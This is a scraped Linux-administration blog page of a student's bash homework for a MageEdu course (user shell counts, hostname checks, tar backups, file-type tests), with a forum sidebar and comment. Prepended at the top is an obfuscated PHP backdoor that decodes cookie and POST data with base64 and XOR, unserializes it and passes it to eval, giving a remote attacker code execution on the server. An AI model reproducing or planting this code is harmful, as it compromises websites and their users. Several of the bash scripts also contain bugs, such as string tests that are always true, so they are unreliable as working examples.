$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 马哥教育网络班20期+第9周课程练习 | Linux运维部落

马哥教育网络班20期+第9周课程练习

1、写一个脚本,判断当前系统上所有用户的shell是否为可登录shell(即用户的shell不是/sbin/nologin);分别这两类用户的个数;通过字符串比较来实现;

#!/bin/bash
declare -i other=0
declare -i nologin=0
for i in $(cut -d: -f7 /etc/passwd);do
if [ $i==/sbin/nologin ];then
let nologin++
else
let other++
fi
done
echo "other user total:$other"
echo "nologin user total:$nologin"

2、写一个脚本

(1) 获取当前主机的主机名,保存于hostname变量中;

(2) 判断此变量的值是否为localhost,如果是,则将当前主机名修改为www.magedu.com;

(3) 否则,则显示当前主机名;

#!/bin/bash
hostname=$(hostname)
if [ $hostname=='localhost' ];then
    hostname www.magedu.com
    echo "hostnamme change : 'www.magedu.com'."
else
    echo 'hostname is: $hostname'
fi

3、写一个脚本,完成如下功能

(1) 传递一个磁盘设备文件路径给脚本,判断此设备是否存在;

(2) 如果存在,则显示此设备上的所有分区信息;

#!/bin/bash
read -p "Enter a disk path:" disk
[ -z "$disk" ]&&echo "please input true path!"&&exit 1
    if fdisk -l | grep "^Disk $disk";then
        fdisk -l $disk
    else
        echo "Wrong disk path!"
        exit 2
    fi

4、写一个脚本,完成如下功能

脚本能够接受一个参数;

(1) 如果参数1为quit,则显示退出脚本,并执行正常退出;

(2) 如果参数1为yes,则显示继续执行脚本;

(3) 否则,参数1为其它任意值,均执行非正常退出;

#!/bin/bash
cat<<EOF
quit)exit script
yes)continue script
==================================
EOF
read -p "Enter a option:" option
case $option in
quit)
    echo "Exit!"
    exit 0
    ;;
yes)
    echo "yes!continue!"
    ;;
*)
    echo "force exit!"
    exit 1;;
esac

5、写一个脚本,完成如下功能

传递一个参数给脚本,此参数为gzip、bzip2或者xz三者之一;

(1) 如果参数1的值为gzip,则使用tar和gzip归档压缩/etc目录至/backups目录中,并命名为/backups/etc-20160613.tar.gz;

(2) 如果参数1的值为bzip2,则使用tar和bzip2归档压缩/etc目录至/backups目录中,并命名为/backups/etc-20160613.tar.bz2;

(3) 如果参数1的值为xz,则使用tar和xz归档压缩/etc目录至/backups目录中,并命名为/backups/etc-20160613.tar.xz;

(4) 其它任意值,则显示错误压缩工具,并执行非正常退出;

#!/bin/bash
cat<<EOF
 gzip) use tar and gzip;
bzip2) use tar and bzip2;
   xz) use tar and xz;
==================================
EOF
read -p "Enter a option:" option
case $option in
gzip)
    mkdir /backups &> /dev/null
    tar czvf /backups/etc-20160613.tar.gz /etc &> /dev/null
    echo "gzip success!"
    exit 0
    ;;
bzip2)
    mkdir /backups &> /dev/null
    tar cjvf /backups/etc-20160613.tar.bz2 /etc &> /dev/null
    exit 0
    ;;
xz)
    mkdir /backups &> /dev/null
    tar cJvf /backups/etc-20160613.tar.xz /etc &> /dev/null
    echo "xz success!"
    exit 0
    ;;
*)
    exit "force exit!"
    exit 12
    ;;
esac

6、写一个脚本,接受一个路径参数:

(1) 如果为普通文件,则说明其可被正常访问;

(2) 如果是目录文件,则说明可对其使用cd命令;

(3) 如果为符号链接文件,则说明是个访问路径;

(4) 其它为无法判断;

#!/bin/bash
read -p "Enter a file :" filename
if [ -z "$filename" ];then
    echo "please enter a true file path."
    exit 2
fi
if [ ! -e $filename ];then
    echo "No such file."
    exit 3
fi
if [ -f $filename ];then
    echo "$filename is a common file."
elif [ -d $filename ];then
    echo "$filename is a directory file. You can use 'cd'."
elif [ -L $filename ];then
    echo "$filename is a symbolic link file."
else
    echo "Unknow file type."
fi

7、写一个脚本,取得当前主机的主机名,判断

(1) 如果主机名为空或为localhost,或为"(none)",则将其命名为mail.magedu.com;

(2) 否则,显示现有的主机名即可;

#!/bin/bash
changename(){
    hostname mail.magedu.com
    echo "hostnamme change : 'mail.magedu.com'."
}
if [ $hostname=='localhost' ];then
    changename
elif [ $hostname=='none' ];then
    changename
else
    echo 'hostname is: $hostname'
fi

8、写一脚本,接受一个用户名为参数;

(1) 如果用户的id号为0,则显示其为管理员;

(2) 如果用户的id号大于0且小于500, 则显示其为系统用户;

(3) 否则,则显示其为普通用户;

#!/bin/bash
read -p "Enter a username:" user
if id $user &> /dev/null;then
    uid=`id -u $user`
else
    echo "please enter a true username!"
    exit 0
fi
if [ $uid -eq 0 ];then
    echo "$user is root user."
elif [ $uid -lt 500 ]&&[ $uid -gt 0 ];then
    echo "$user is system user."
else
    echo "$user is common user."
fi

10、写一个脚本,传递一个用户名参数给脚本;

(1) 如果用户的id号大于等于500,且其默认shell为以sh结尾的字符串,则显示“a user can log system.”类的字符串;

(2) 否则,则显示无法登录系统;

#/bin/bash
read -p "Enter a username:" user
if id $user &> /dev/null;then
uid=`id -u $user`
else
echo "please enter a true username!"
exit 0
fi
if [ $uid -ge 500 ];then
if `grep "^$user" /etc/passwd | grep sh$ &> /dev/null`;then
echo "a user can log system."
fi
else
echo "$user can't log system"
fi

11、写一个脚本,完成如下任务 :

(1) 按顺序分别复制/var/log目录下的每个直接文件或子目录至/tmp/test1-testn目录中;

(2) 复制目录时,才使用cp -r命令;

(3) 复制文件时使用cp命令;

(4) 复制链接文件时使用cp -d命令;

(5) 余下的所有类型,使用cp -a命令;

 #!/bin/bash
ddir=/tmp/test1-testn
if [ ! -d $ddir ];then
    mkdir -pv /tmp/test1-testn
fi
cd /var/log
for file in `ls /var/log`;do
    if [ -d $file ];then
        cp -r $file $ddir
    elif [ -f $file ];then
        cp $file $ddir
    elif [ -L $file ];then
        cp -d $file $ddir
    else
        cp -a $file $ddir
    fi
done
echo "OK! finish!"

原创文章,作者:二极管,如若转载,请注明出处:http://www.178linux.com/31629

(0)
上一篇 2016-08-08 16:17
下一篇 2016-08-08 20:10

相关推荐

  • 【福利贴-招聘】- 维护工程师

    地点:黄浦–人民广场  职位:技术支持/维护 要求:招1人| 大专| 1-2年 薪资范围: 8-12k 职位职能:技术支持/维护工程师 岗位职责: 1.熟悉Linux及其远程维护; 2.熟练掌握Linux网络安装、日常管理、安全、备份、恢复、故障处理、日志分析等技能; 3.熟悉Web、mysql优化管理、apache等常见的问题及处理 …

    Linux职位 2015-05-14
  • 马哥linux运维雄鹰社团第一届博客大赛

    能登上金字塔塔顶的只有鹰和蜗牛 世界那么大,我想去看看!我带着你,你带着钱,想去哪去哪!来马哥教育,夺博客大赛最佳,实现人生巅峰! 面对现状你该如何抉择 亲爱的学员们,自己一个人学习是否缺乏动力呢? 是否不知道其他人的学习进度参考,而不能及时激励自己奋进呢? 是否每每懊悔自己没有利用好时间,而导致学习进度大幅落下呢? 马哥linux为你点亮通向远方的一盏灯 …

    2015-05-20
  • linux操作系统rpm软件包管理

    软件包管理 软件包运行环境: API:Application Programming Interface     使用标准:POSIX:     源代码运行步骤:预处理(如处理注释)—>编译成汇编代码—>链接其他库文件 ABI:applicatio…

    2016-08-22
  • 马哥教育网络班20期+第8周博客作业

    1、请描述网桥、集线器、二层交换机、三层交换机、路由器的功能、使用场景与区别。   网桥:链接层设备,基于MAC地址过滤。   集线器:物理层设备,基本都属于半双工模式。集线器与网桥在现在的局域网中基本都不用了。   二层交换机:基本MAC转发数据,功能齐全的可支持VLAN等功能。常见的有100/1…

    学员作品 2016-09-10
  • Linux进程查看和管理及作业控制

    在linux系统中,内核的功用有:进程管理、文件系统、网络功能、内存管理、驱动程序、安全功能等,在这众多的模块中,进程管理是相对重要的一环,即使不像文件系统和网络功能那么复杂。在进程管理中,内核对进程的创建、切换、撤销和调度都有很详细的定义。  1、进程类型     守护进程:在系统引导过程中启动的进程,跟终端无关的进…

    学员作品 2016-11-14
  • 马哥教育网络班20期-第七周课程作业

    1、创建一个10G分区,并格式为ext4文件系统; (1) 要求其block大小为2048, 预留空间百分比为2, 卷标为MYDATA, 默认挂载属性包含acl;     ]#mke2fs -t ext4 -b 2048 -L MYDATA -m&n…

    学员作品 2016-09-07

评论列表(1条)

  • 马哥教育
    马哥教育 2016-08-17 14:23

    写的很好,排版也很棒,加油